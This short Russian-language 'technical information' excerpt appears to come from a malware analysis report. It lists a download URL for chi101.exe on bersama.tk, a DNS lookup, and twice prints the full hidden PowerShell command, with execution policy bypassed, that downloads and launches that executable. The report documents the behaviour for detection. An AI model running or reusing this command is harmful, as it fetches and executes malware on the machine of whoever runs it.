Техническая информация
- http://bersama.tk/kell202/chi101.exe как %temp%\chi101.exe
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://bersama.tk/kell202/chi101.exe','%TEMP%\chi101.exe'); Start-Process('%TEMP%\chi101.exe')
- DNS ASK be##ama.tk
- '<SYSTEM32>\cmd.exe' /c powershell.exe -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://bersama.tk/kell202/chi101.exe','%TEMP%\chi101.exe'); Start-Process('%TEMP%\chi101.exe')' (со скрытым окном)